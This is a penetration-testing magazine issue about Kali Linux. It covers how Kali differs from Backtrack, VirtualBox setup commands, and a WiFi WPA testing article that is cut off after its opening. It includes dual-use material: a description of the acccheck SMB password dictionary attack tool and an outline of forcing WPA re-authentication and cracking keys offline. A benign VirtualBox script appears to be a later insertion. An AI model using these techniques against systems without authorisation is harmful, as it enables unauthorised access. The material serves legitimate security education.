
Cyber Security Auditing Software

Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.

Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

www.titania.com

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customer's specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at titania.com

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania's products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

www.titania.com
Dear PenTest Readers!

With great pleasure, we present you this issue of PenTest Extra. Kali Linux 2 is the long expected continuation of our fabulous adventure with this Offensive Security's distribution. The OS is a must-have of any pentester and ethical hacker, therefore, in the issue, you will find both advanced scenarios and some introductory descriptions covering most of Kali's capacities.

And so, Pranshu Bajpai opens the issue giving you an In-Depth Review of the Kali Linux: A Hacker's Bliss. Afterwards, in the Scenarios section you will have An Insight on Kali Linux by Sonu Tiwary. With Steve Poulsen, you will get through Kali Linux Wi-Fi Testing. The next topic, covered by Fatty Lamin, is Web Applications with Kali Linux. The section will be closed by Kevin Pescatello with his vision of Penetration Testing with Linux and by Ignacio Sorribas Bypassing new generation Firewalls with Meterpreter and SSH Tunnels.

Next, you will explore The top 10 Kali Linux Security Tools with Wolf Halton. And, at the end, in the Extra section you will read Analysis of Security and Penetration Tests for Wireless Networks with Kali Linux by Demóstenes Zegarra Rodríguez, who will also share with you some of his personal thoughts on the toolbox in the interview performed by Milena Bobrowska. Finally, the issue will be closed by Jeff Weekes and Carlos Villalba Mapping Kali Usage to NIST800-115 for you and by an interview with Jeff Weekes by Milena Bobrowska.

And this is it! Enjoy your reading, enjoy your PenTest!

Milena Bobrowska and PenTest Team

Editor in Chief: Ewa Duranc, ewa.duranc@pentestmag.com
Managing Editor: Milena Bobrowska, milena.bobrowska@pentestmag.com
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn
Betatesters & Proofreaders: Rodrigo Comegno, David Jardin, Varun Nair, Greg Rossel, John Webb, Laszlo Acs, Abhiraj, Gilles Lami, José Luis Herrera, Ivan Gutierrez Agramont, Phil Patrick, Dallas Moore, Marouan Bellioum, Alexander Groisman, Mbella Ekoume, Arnoud Tijssen, Abhishek Koserwal
Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.
Senior Consultant/Publisher: Pawel Marciniak
CEO: Ewa Dudzic, ewa.dudzic@pentestmag.com
Production Director: Andrzej Kuca, andrzej.kuca@pentestmag.com
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski, ireneusz.pogroszewski@pentestmag.com
Publisher: Hakin9 Media Sp. z o.o. SK, 02-676 Warszawa, ul. Postępu 17D
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

EXTRA 05/2013(16) Page 4 http://pentestmag.com


CONTENTS

KALI LINUX INTRODUCTION

06 In-Depth Review of the Kali Linux: A Hacker's Bliss
By Pranshu Bajpai
Kali Linux is a blessing for Penetration Testers worldwide. It addresses many of the shortcomings of its predecessor Backtrack and is immensely popular with professional Hackers. Here we discuss the (relatively) new Kali Linux in depth and explore the qualities that make it different from Backtrack.

SCENARIOS

10 Kali Linux - the BackTrack Successor
By Sonu Tiwary
On March 13, 2013, Kali, a complete rebuild of BackTrack Linux, was released. It has been constructed on Debian and is FHS (Filesystem Hierarchy Standard) compliant. It is an advanced Penetration Testing and Security Auditing Linux distribution. It adheres completely to Debian development standards. However, one should not treat Kali Linux exactly the same as Debian...

16 Kali Linux Wi-Fi Testing
By Steve Poulsen
In this article, we will explore penetration testing of a wireless 802.11 (WiFi) network using Kali Linux. We will limit our testing to WPA, which is of more interest to professionally secured WiFi networks. It is also beneficial for us to focus on the command-line tools in order to provide a better understanding of the steps involved. This will help us gain a deeper understanding which will help us to adapt our testing beyond standard recipes. The following general steps will be followed in order to better perform a WiFi security assessment and to afterward further lock down our systems.

26 Web Applications with Kali Linux
By Fatty Lamin
Many penetration testers and serious hackers use Linux-based open source penetration test tools from which to launch their attacks. Kali Linux contains a number of tools that can be used by security professionals during a security assessment process and vulnerability assessment. In this article, we will begin with a brief overview of Kali's features then focus on how to perform web application testing using the tools installed in Kali Linux.

36 Penetration testing with Linux
By Kevin Pescatello
Penetration testing with Linux is one of the best ways to perform tests. It is a versatile tool. This article will cover using Backtrack5 RC3 and Armitage for the test as it was executed during the pentest. This article may not cover all features of Armitage. However, in order to provide you a better understanding of Armitage, Kali will be used as well in different screenshots.

44 Bypassing new generation Firewalls with Meterpreter and SSH Tunnels
By Ignacio Sorribas
In this article we see how in some cases the firewall detects malicious code and is capable of blocking the connections, but also demonstrate how easy it is to bypass this restriction.

TOOLS

52 The Top 10 Kali Linux Security Tools
By Wolf Halton
This article is not the place to detail the features of all these tools, but perhaps the tools that the developers consider to be the top 10 could be covered to some benefit to people considering putting Kali into their network security toolbox.

EXTRA

66 Analysis of Security and Penetration Tests for Wireless Networks with Kali Linux + Interview with the Author
By Demóstenes Zegarra Rodríguez
The focus of this study is to perform penetration tests through a Linux distribution, Kali, which has a collection of security and forensics tools.

70 Mapping Kali Usage to NIST800-115
By Jeff Weekes and Carlos Villalba
Kali is an invaluable platform that, when coupled with a sound methodology, can make a penetration tester's life that much easier. In some cases Kali provides so many tools that novice penetration testers may struggle with how all the tools fit together and how they can be used to truly meet a client or internal customer's penetration test objectives. In this article we will try to shed some light on how Kali can be used with a penetration testing methodology to streamline the penetration testing process and create a stronger deliverable for the client.

80 Interview with Jeff Weekes
By PenTest Team


KALI LINUX INTRODUCTION

In Depth Review of the Kali Linux: A Hacker's Bliss
Kali Linux is a blessing for Penetration Testers worldwide. It addresses many of the shortcomings of its predecessor Backtrack and is immensely popular with professional Hackers. Here we discuss the (relatively) new Kali Linux in depth and explore the qualities that make it different from Backtrack.

Kali Linux is a penetration testing and security auditing Linux distribution. After its release in March 2013, Kali Linux has quickly become the new favorite among PenTesters worldwide as their choice of PenTesting OS. Replacing its predecessor Backtrack, Kali incorporated several new features and looks quite promising. It is available for the i386 and amd64 architectures and has the same minimum hardware requirements as Backtrack: 1 GHz CPU, 8 GB of hard disk space, 300 MB RAM, and a DVD writer or the ability to boot from a pen drive.

Figure 1. Kali Linux Main Menu

A Little History
To be very concise, Kali is an offshoot of Backtrack, which is an offshoot of Whax, which is itself an offshoot of Whoppix, which is derived from Knoppix. Something common among all of these distros is that they were focused on Digital Forensics and Intrusion Detection, with Backtrack and Kali adding a whole lot of tools for PenTesting purposes. Backtrack has been giving machine guns to monkeys since 2007, so it has had a long reign as the favorite distro of PenTesters worldwide. Offensive-Security, the creators of Backtrack, decided to incorporate many changes in the new Backtrack 6 (as it was called at that time). Since it was built from scratch, it was significantly different from the older versions of Backtrack, and Offensive-Security decided to give the distro a new name: Kali Linux.

What was wrong with Backtrack and why did it need a change?
We all love Backtrack, but the bottom line is that there are a lot of problems associated with this distro. The most annoying problem is updating. There was always a fear of breaking something if you updated it. There were too many tools and some of them weren't updated as frequently as the others. So updating the dependencies of some would cause others to crash, and we struggled to maintain a balance where all these tools and their dependencies would co-exist without getting in each other's way.

When we wanted to use a tool, we needed to type its absolute path in the shell. For example: /pentest/passwords/john/john file_name. Remembering the locations of the tools was a pain and it just made things complicated.

In addition, Backtrack had a lot of puny errors which crept up here and there while we were working, small issues that we had to resolve on our own or run to the Backtrack forums and get help from other Pentesters there. For example, the wicd D-Bus error that was ready to greet us when we installed a fresh copy of BT5 and tried to connect to a network. The Backtrack forums (and other websites) are filled with how-to posts that attempt to provide solutions to such problems. Eventually we learned to get around these issues, but it did waste a lot of our time.

What makes Kali different from Backtrack 5?
This is the most asked question about Kali today. Offensive Security has tried to answer it on their website: "Unfortunately for us, that's not a simple question to answer. It's a mix between everything and not much, depending on how you used Backtrack."

Highlights of the new Kali

Switch From Ubuntu to Debian
Kali Linux is based on Debian (Debian Wheezy). This turned out to be a great move by Offensive-Security. The new Kali is much more comfortable to use than its predecessor.

Filesystem Hierarchy Standard Compliance
In the words of muts from Offensive Security: "What this means is that instead of having to navigate through the /pentest tree, you will be able to call any tool from anywhere on the system as every application is included in the system path." This is again a very welcome change in Kali.

Customizations of Kali ISOs
If need be, we can now build our own customizations of Kali Linux. These ISOs can be bootstrapped directly from the repositories maintained by Offensive Security.

ARM Devices Support
Kali is available for the following ARM devices: rk3306 mk/ss808, Raspberry Pi, ODROID U2/X2, Samsung Chromebook, EfikaMX, BeagleBone Black, CuBox and Galaxy Note 10.1.

Easier Updating and Upgrading
Packages on Kali can be updated with ease without worrying about breaking something. This is because the packages in the Kali rep
ositories are Debian compliant. The Kali distribution itself can be upgraded to a newer version without the need to re-install the distro.

300+ PenTesting Tools
This is quite a large collection, and chances are that we won't be needing all of them and we might be needing some that are not included by default. However, packages can always be grabbed from the repositories at will, so that's never a problem.

What is this Forensics Mode?
While booting up Kali Linux, an option exists for Live Forensic Mode (Figure 2). This is quite a useful feature if we want to do some real-world forensic work. When in Forensics Mode, the internal hard disk is not touched in any manner. The people at Offensive Security performed a hash comparison test where hashes were taken of the hard drive before and after using Kali in forensics mode. At the end of the test, the hashes matched, suggesting that no changes were made during the operation. Also worth noticing is that the auto-mount of removable media is disabled while in Forensics mode.

Figure 2. Kali Linux Boot Menu



Metasploit Framework in Kali
The discussion on Kali (or Backtrack for that matter) would be incomplete without a mention of how well the Metasploit Framework is integrated with this distro. While msfconsole brings it up, msfupdate can update the Metasploit Framework. Like in Backtrack, PostgreSQL is used as the database backend.

Figure 3. Metasploit Framework in Kali

The guys from Offensive Security and Rapid7 (the people behind the Metasploit project) co-operated to pre-load Kali Linux with msfpro (the professional web-service version of the Metasploit Framework). Metasploit in Kali has full tech support from Rapid7.

Tools in Kali Linux
Tools are mostly the same as those found in Backtrack. However, in the Kali Linux menu, 10 security tools have been highlighted as the Top 10 (Figure 4). Anyone who has worked on BT would have no trouble guessing which tools would be available on Kali and which need to be grabbed from the repositories. More than 300 tools come packaged with Kali, which are enough to serve the needs of most PenTests.

The Top 10 tools in Kali Linux are mentioned below:

- Aircrack-ng: wireless cracking
- Burp Suite: web application pentesting
- Hydra: online brute-forcing of passwords
- John: offline password cracking
- Maltego: intelligence gathering
- Metasploit Framework: exploitation
- Nmap: network scanning
- OWASP ZAP: finding vulnerabilities in web applications
- sqlmap: exploiting SQL injection vulnerabilities
- Wireshark: network protocol analyzer

Figure 4. The Top 10 Security Tools in Kali

Kali Community Support
Kali Linux has an official IRC channel on the Freenode network, #kali-linux. It provides a good platform to interact with other users of Kali and get support. Kali Linux provides three official repositories:

- http.kali.org: main package repository
- security.kali.org: security packages
- cdimage.kali.org: ISO images

Subtle differences noticed while regularly working on Kali
One had to bring up the graphical interface manually by typing startx in Backtrack. However, Kali loads the graphical user interface by default. The Kali Linux environment is much cleaner and more stable than Backtrack 5. The Nessus vulnerability scanner is not installed in Kali by default (as it was in Backtrack 5); you would have to install it manually from the Debian package. Kali comes with a graphical package installer which can be used to install new packages with the click of a mouse. It can be brought up by typing the command: gpk-application.

Figure 5. Graphical Package Installer in Kali


On the Web
- www.kali.org: the main Kali Linux website
- docs.kali.org: documentation site
- forums.kali.org: discussion forums
- bugs.kali.org: for reporting bugs
- git.kali.org: monitor the development of Kali Linux

In Backtrack, several PenTesters faced issues in getting their Bluetooth up and running. The Backtrack forums are filled with people troubleshooting their Bluetooth devices. In Kali Linux no such problem was noticed and Bluetooth works fine. Firefox is replaced by Iceweasel, which doesn't matter much as they are both similar. However, the Iceweasel browser in Kali doesn't come pre-loaded with plug-ins like NoScript, as Firefox in Backtrack did; Iceweasel comes clean. Small issues like the inability to control your backlight in Backtrack have been fixed in Kali Linux. So you would have a smoother working environment.

Summary
Kali Linux definitely turned out to be everything that a Penetration Tester would want from a Linux distro. It does have room for improvement though, and the developers are working on it constantly to make it better. It addresses the problems Backtrack 5 had and it is significantly different from its predecessor, yet any PenTester who was comfortable using Backtrack 5 would find his way around Kali Linux with ease. The default login in Kali Linux is root, so it is not an everyday desktop OS and is not recommended for those new to Linux. However, it fits penetration testing needs perfectly.

Pranshu Bajpai
Pranshu Bajpai (MBA, MS) is a Computer Security Professional specialized in Systems, Network and Web Penetration Testing. He is completing his Masters in Information Security at the Indian Institute of Information Technology. Currently he is also working as a Freelance Penetration Tester on a Counter-Hacking Project with a Security Firm in Delhi, India, where his responsibilities include Vulnerability Research, Exploit kit deployment, Maintaining Access and Reporting. He is an active speaker with a passion for Information Security. In his free time he enjoys listening to Classic Rock while blogging on www.lifeofpentester.blogspot.com.

a d v e r t i s e m e n t

Reduce Time, Reduce Cost, Reduce Risk

EMBEDDED LINUX
Design, Development, and Manufacturing

Embedded Software Design Services


Our embedded design expertise, coupled with our systems design skills, allows us to deliver products that are leading edge as well as solid and robust. Embedded DSP/uC designs including embedded Linux, TI DaVinci™ DVSDK, as well as PC based Linux systems are within our portfolio.

For more information, contact us at


sales@css-design.com
402-261-8688

www.css-design.com

Communication Systems Solutions 6030 S. 58th St. STE C Lincoln, NE 68516 402.261.8688
SCENARIOS

Kali Linux
The BackTrack Successor
On March 13, 2013, Kali, a complete rebuild of BackTrack Linux, was released. It has been constructed on Debian and is FHS (Filesystem Hierarchy Standard) compliant. It is an advanced Penetration Testing and Security Auditing Linux distribution. It adheres completely to Debian development standards. However, one should not treat Kali Linux exactly the same as Debian.

BackTrack is an open-source Linux-based penetration testing toolset. In Backtrack, the common tools that you needed to perform a security assessment were all packaged into one nice distribution and ready to go at a moment's notice. BackTrack made it easy to create a new VM (Virtual Machine) from the downloaded ISO image, perform the assessment, then either archive that VM for future reference or delete it when done to remove the evidence.

Figure 1. Kali Linux

Kali Linux is a new open source distribution that facilitates penetration testing. Whereas BackTrack was built on Ubuntu, Kali Linux is built from scratch, constructed on Debian and FHS (Filesystem Hierarchy Standard) compliant. Improved software repositories synchronized with the Debian repositories make it easier to keep it updated, apply patches and add new tools. Kali Linux can also be easily customized so that it contains only the packages and features that are required. The desktop environment can also be customized to use GNOME (default), KDE (K Desktop Environment), LXDE (Lightweight X11 Desktop Environment), or whatever you prefer.

Some Other Differences

- In Kali, there is no /pentest directory like in Backtrack 5. Fire up any tool just by typing its name in the shell.
- They have removed the Nessus Vulnerability Scanner in Kali; it can be manually installed by downloading it from Tenable.
- Errors like "Error connecting to wicd's D-Bus..." when you try to fire up Wicd in Backtrack 5 are gone. Kali Linux is much cleaner in this respect than Backtrack 5.
- Kali Linux is smaller in size than Backtrack 5 (which was around 3 GB). The Kali Linux ISO is just 2 GB (approx.) in size.
- Firefox has been replaced by Iceweasel, Debian's rebranded build of Mozilla Firefox, so the two are very similar. However, whereas Firefox in Backtrack came with NoScript and similar security add-ons, Iceweasel in Kali comes clean.
- Separate listing of the much-hyped security tools in the Kali Linux menu under Top 10 Security Tools.
- VLC Player comes pre-installed with Kali Linux. In Backtrack 5 you had to install it manually, and then it gave you an error saying "Won't run in root mode" and you had to hex-edit the VLC binary.
- The light PDF viewer in Backtrack has been replaced by Document Viewer.
- No gedit in Kali; instead you can use Leafpad.

Who Should Use Kali Linux
So, the question arises: Should I use Kali Linux? Kali Linux aims at professional penetration testing and security auditing. To reflect these needs, several core changes have been implemented in Kali Linux:

- Single user, root access by design: Since it has been designed for security auditing, Kali Linux is designed to be used in a single, root user scenario.
- Network services disabled by default: Major security threats come from the various network services running on the system. Kali Linux is equipped with sysvinit hooks which disable network services by default. These hooks allow us to install various services on Kali Linux, while ensuring that our distribution remains secure by default, no matter what packages are installed. Additional services such as Bluetooth are also blacklisted by default.
- Custom Linux kernel: Kali Linux uses an upstream kernel, patched for wireless injection.

Since Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing, it is not a recommended distribution for those unfamiliar with Linux. Misuse of security tools within your network, particularly without permission, may cause irreparable damage and result in significant consequences.

NOTE
If you are looking for a Linux distribution to learn the basics of Linux and need a good starting point, Kali Linux is not the ideal distribution for you. You may want to begin with Ubuntu or Debian instead.

Installing Kali Linux as a Virtual Machine in VirtualBox
Kali Linux can be run as a Live CD or it can be installed as a virtual machine in VirtualBox. You can follow the steps below to install Kali Linux as a virtual machine in VirtualBox:

- Creating a proper virtual machine for Kali Linux.
- Installing Kali Linux to a hard disk inside the virtual machine.
- Installing the VirtualBox Guest Additions tools in Kali Linux.
- Setting up shared folders in VirtualBox with your Kali Linux installation.

Note
The instructions below were performed with VirtualBox version 4.2.8. If you are experiencing issues with 4.1.x, please upgrade VirtualBox to this or a later release.

Creating the Virtual Machine

- Launch VirtualBox and, using the Virtual Machine Manager, create a new virtual machine by clicking New in the upper left corner.
- Provide a Name for the virtual machine, OS (Operating System) Type and Version. Set the Type to Linux and the Version to Debian. Please make sure to choose the proper 32 or 64 bit option for your architecture. Once completed, click the Continue button to move on with the setup.
- Configure the amount of memory to allocate to your new virtual machine. As a minimum, allocate 2048MB. Once completed, click the Continue button.
- The next step is to create the virtual machine hard drive. The default is to "Create a virtual hard drive now". Accept the default and click the Create button in the lower right portion of the window.
- Pick your hard drive file type. The default is VDI (VirtualBox Disk Image), however you can create any other type. For example, creating a VMDK (Virtual Machine Disk) will allow you to use this hard drive with VMware as well as VirtualBox. Once you have selected your file type, click the Continue button.
- The next step gives you two options: to allocate the entire amount of disk space at once, or to dynamically allocate hard drive space as it is needed. Once you have made your selection, click the Continue button.


- Provide the hard drive file location and size. For location, it will always install in the default directory and only needs to be changed if desired. Approximately 8GB of disk space is required for a base install of Kali Linux. It is good practice to provide roughly 4 times that amount in order to ensure proper space as you add to and update the installed system with tools and files. Once you have provided the desired size, click the Create button.

Now the new virtual machine has been created. However, there are still a few additional configuration settings that you need to make. With your newly created Kali Linux virtual machine selected, click the General link in the right portion of the Manager window. This will launch a window that allows for additional configuration settings. At least the following two changes should be made during this step:

- Select the System option and the Processor tab to change the number of processors. By default, the machine is granted only 1 VCPU (Virtual CPU). Provide at least 2 processors.
- Next, select the Storage option to attach your Kali Linux ISO image. In the Storage Tree window, select your CD-ROM controller. Then within the Attributes pane click the CD-ROM icon and choose "Choose a virtual CD/DVD disk file" from the pop-up menu. This will open a window to browse the host system for your Kali Linux ISO file. Once selected, click the Open button and then click the OK button to save all your changes; you will be returned to the VirtualBox Manager.

You can now click the Start button to launch the VM (Virtual Machine) and begin the Kali Linux installation process.

Kali Linux Installation to a hard disk inside the virtual machine
The tutorial for installing Kali Linux can be found here. Once installation is complete, you will need to install the VirtualBox Guest Additions tools.

Install VirtualBox Guest Additions Tools in Kali Linux
In order to have proper mouse and screen integration as well as folder sharing with your host system, you will need to install the VirtualBox Guest Additions. Once you have booted into your Kali Linux virtual machine, open a terminal window and issue the following command to install the Linux kernel headers:

apt-get update && apt-get install -y linux-headers-$(uname -r)

Now attach the Guest Additions CD-ROM. This can be done by selecting Devices from the VirtualBox menu and selecting "Install Guest Additions". It will mount the Guest Additions ISO in the virtual CD drive of your Kali Linux virtual machine. When prompted to autorun the CD, click the Cancel button (Figure 2).

Figure 2. Cancel_Auto_Run

From a terminal window, copy the VBoxLinuxAdditions.run file from the Guest Additions CD-ROM to a path on your local system. Make sure it is executable and run the file to begin installation (Figure 3).

Figure 3. VBoxAdditions_Install
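The VirtualBox Manager steps above (a new VM of type Linux/Debian, 2048 MB of memory, two processors, a VDI disk sized at four times the 8 GB base install, the Kali ISO attached to the CD-ROM controller) plus the shared-folder step described further on in the article can be reproduced from the host's command line with VBoxManage, which makes the lab VM reproducible instead of a sequence of clicks. The script below is an added example written for this page, not code from the article or from the VirtualBox documentation; it assumes VirtualBox 4.2 or later on the host, and the VM name, ISO path and share directory are placeholders set through variables.

```shell
#!/bin/sh
# Added example (not from the article): the VirtualBox Manager clicks above
# expressed as VBoxManage commands, so the Kali lab VM can be rebuilt
# identically every time. Assumes VirtualBox 4.2+ on the host.
# Placeholders (override via the environment):
VM_NAME=${VM_NAME:-kali}                       # name shown in the Manager
OS_TYPE=${OS_TYPE:-Debian_64}                  # Type Linux / Version Debian (64-bit)
MEM_MB=${MEM_MB:-2048}                         # the article's minimum
CPUS=${CPUS:-2}                                # at least 2 vCPUs
DISK_MB=${DISK_MB:-32768}                      # 4 x the 8 GB base install
KALI_ISO=${KALI_ISO:-"$HOME/kali-linux.iso"}   # assumed download path
SHARE_DIR=${SHARE_DIR:-"$HOME/kali-share"}     # host folder to share
DISK=${DISK:-"$HOME/VirtualBox VMs/$VM_NAME/$VM_NAME.vdi"}
DRY_RUN=${DRY_RUN:-0}                          # 1 = print commands only

# Either execute a command or, with DRY_RUN=1, print it on one line so the
# plan can be reviewed on a machine without VirtualBox installed.
run() {
    if [ "$DRY_RUN" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# One VBoxManage call per Manager step, in the same order as the article.
build_kali_vm() {
    # "New": name, type Linux, version Debian; registers it with the Manager
    run VBoxManage createvm --name "$VM_NAME" --ostype "$OS_TYPE" --register
    # memory and Processor tab; boot from the DVD first so the installer runs
    run VBoxManage modifyvm "$VM_NAME" --memory "$MEM_MB" --cpus "$CPUS" \
        --boot1 dvd --boot2 disk
    # "Create a virtual hard drive now", VDI format, dynamically allocated
    run VBoxManage createhd --filename "$DISK" --size "$DISK_MB" --format VDI
    # a SATA controller for the disk, an IDE controller for the CD-ROM
    run VBoxManage storagectl "$VM_NAME" --name SATA --add sata --controller IntelAhci
    run VBoxManage storageattach "$VM_NAME" --storagectl SATA --port 0 --device 0 \
        --type hdd --medium "$DISK"
    run VBoxManage storagectl "$VM_NAME" --name IDE --add ide
    # the Storage step: Kali ISO in the virtual CD/DVD drive
    run VBoxManage storageattach "$VM_NAME" --storagectl IDE --port 0 --device 0 \
        --type dvddrive --medium "$KALI_ISO"
    # the Shared Folders step; shows up in the guest as /media/sf_share once
    # the Guest Additions are installed (auto-mount and permanent, as in the text)
    run VBoxManage sharedfolder add "$VM_NAME" --name share --hostpath "$SHARE_DIR" --automount
}

# Build when invoked directly with --build; sourcing the file only defines
# the functions so they can be reused or dry-run.
if [ "${1:-}" = "--build" ]; then
    build_kali_vm
fi
```

Run it as `DRY_RUN=1 sh kali-vm.sh --build` first to see the eight commands it would issue, then without DRY_RUN to create the VM; `VBoxManage startvm kali` then boots the installer, after which the Guest Additions steps below apply unchanged inside the guest.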


cp /media/cd-rom/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
cd /root
./VBoxLinuxAdditions.run

If the Guest Additions CD is mounted somewhere else (Debian's default mount point is /media/cdrom0), adjust the path in the first command; mount shows where it is.

To complete the Guest Additions installation, reboot the Kali Linux VM (Virtual Machine). Full mouse and screen integration as well as the ability to share folders with the host system should now be available.

Creating Shared Folders with the Host System
There are a few short steps that need to be completed in order to share folders on your host system with your Kali Linux VM (Virtual Machine). From the VirtualBox Manager, select your Kali Linux VM instance and click on the Shared Folders link in the right window pane. This will launch a pop-up window for adding shared folders. Within this window click the icon to add a folder.

In the Folder Path text box, provide the path to the folder you would like to share, or click the drop-down arrow to browse your host system for the path. Select the check boxes that allow for Auto-mount and Make Permanent and click the OK button both times when prompted (Figure 4). Under the media directory, your shared folders will now be available. A bookmark or link can also be created for easier access to the directory.

Figure 4. Shared_Folder_Config

Kali Linux Forensics Mode
The Forensic Boot introduced in BackTrack Linux, which continued on through BackTrack 5, also exists in Kali Linux. The Forensics Boot option has proven to be very popular due to the widespread availability of the operating system. Many people have Kali ISOs lying around and when a forensic need comes up, it is quick and easy to put Kali Linux to the job. Pre-loaded with the most popular open source forensic software, Kali is a handy tool when you need to do some open source forensic work (Figure 5).

Figure 5. Kali_Forensic_Mode

When booted into the forensic boot mode, there are a few very important changes that are made.

The internal hard disk is not touched. This means that if a swap partition exists, it will not be used, and no internal disk will be auto-mounted. To verify this, I removed the hard drive from a standard system. Attaching this to a commercial forensic package, I took a hash of the drive. I then re-attached the drive to the computer and booted up off Kali in forensic boot mode. After using Kali for a period of time, I then shut the system down, removed the hard drive, and took the hash again. These hashes matched, indicating that at no point was anything changed on the drive at all.

Figure 6. Top_10_Security_Tools



SCENARIOS

The auto-mount of any removable media has been disabled. So thumb drives, CDs, and so on will not be auto-mounted when inserted. The idea behind all of this is simple: nothing should happen to any media without direct user action. You are responsible for doing anything as a user.

If you are interested in using Kali for real world forensics of any type, validate all forensic tools to ensure that you know their expected behavior in any circumstance in which you may place them.

Exciting Tools in Kali Linux

In Kali Linux, the top 10 security tools have been put under a single menu, which makes life easier for most security enthusiasts (Figure 6).

There are some other exciting tools in Kali Linux:

ACCCHECK.PL

This tool is used for Active Online Attack. It is designed as a password dictionary attack tool that targets Windows authentication via the SMB protocol. It is in fact a wrapper script around the smbclient binary, and as a result is dependent on it for its execution.

Requirements
Victim Machine: Windows XP or Windows 7 or Windows 8
Attacker Machine: Kali Linux OS

Figure 7. acccheck_tool_cli
Figure 8. acccheck_tool_GUI_Access
Figure 9. detect_sniffer6_cli
Figure 10. detect_sniffer6_GUI_Access
Figure 11. dnsrevenum6_cli
Figure 12. dnsrevenum6_GUI_Access



To access the acccheck.pl tool, open a terminal, type acccheck.pl and hit enter. It will display the description, usage and an example of the tool as shown in Figure 7. Or, you can also access this tool graphically (Figure 8).

DETECT_SNIFFER6

This tool is used to test if systems on the local LAN are sniffing.

To access the detect_sniffer6 tool, open a terminal, type detect_sniffer6 and hit enter. It will display the description, usage and an example of the tool as shown in Figure 9.

To access this tool graphically: Figure 10.

DNSREVENUM6

This tool is used for reverse DNS information gathering for IPv6.

To access the dnsrevenum6 tool, open a terminal, type dnsrevenum6 and hit enter. It will display the description, usage and an example of the tool as shown in Figure 11.

To access this tool graphically: Figure 12.

There are various other tools which can be handy as per your requirement. However, after explaining a few interesting facts about Kali Linux in this article, I assume that you will be able to explore other tools on your own.

To conclude, once again I would like to emphasize that if you are really interested in professional penetration testing and security auditing, Kali Linux should be your preferred choice because most of the industry standard security tools are bundled together in this distribution.

There is other interesting information on Kali Linux. For more information, documentation is available at http://docs.kali.org.

Sonu Tiwary

Sonu Tiwary has more than 6 years of experience in the IT industry with core expertise in Linux. He is currently working as an Assistant Technical Manager with Koenig Solutions Ltd. He has vast experience with open source technologies and has also handled several projects which demand in-depth knowledge of Linux. He is an engineering graduate in Computer Science and holds the Red Hat Certified Engineer (RHCE) certification.

Kali Linux WiFi Testing

In this article, we will explore penetration testing of a wireless 802.11 (WiFi) network using Kali Linux. We will limit our testing to WPA, which is of more interest to professionally secured WiFi networks. It is also beneficial for us to focus on the command-line tools in order to provide a better understanding of the steps involved.

This will help us gain a deeper understanding which will help us to adapt our testing beyond standard recipes. The following general steps will be followed in order to better perform a WiFi security assessment and to afterward further lock down our systems.

1. Verify our equipment and setup.
2. Monitor the WiFi networks to obtain information about our access point (AP) under test.
3. Capture AP key exchanges while injecting packets to force re-authentication.
4. Perform off-line key-cracking techniques on the captured data.
5. Use the results to improve security at our AP.
6. Repeat steps 3-5 until satisfied with the security.

As we go through these steps, we will utilize various tools provided by the Kali Linux distribution. We are also able to script these tools together and create our own utilities as needed to aid in our penetration testing. We will also briefly explore WPS exploitation, but only enough to demonstrate that WPS must be disabled for proper security.

WiFi Security

One of the things we must understand before attempting to secure our WiFi network is how it is naturally protected. WiFi networks borrow from decades of research in the field of cryptography, but also borrow some of the problems inherent in secure communication systems.

Cryptographic systems have often solved the security problem quite easily by using encrypted data streams and the latest cryptographic technologies. Encrypting a data stream with a secret key and decrypting it with the same key works out quite well and can provide a high level of protection, provided that certain protocols are followed. However, there is much difficulty introduced in the simple method of sharing the secret key.

Sharing a secret key or private key has been the target of much research and development as well as the focal point in various security attacks. Ideally, if you could share a private key in a private manner, the highest level of security is obtained. This might involve two people meeting in a secret place and handing one to another a secret key written on a piece of paper. The key is then programmed into another system, the paper is properly destroyed, and the secret key is to remain a secret and never be shared where prying eyes could observe. Although this is quite secure, it is also highly impractical.

In lieu of the previous option, we are now introduced to the problem of key exchange. Cryptographic systems often need a way to share a key,



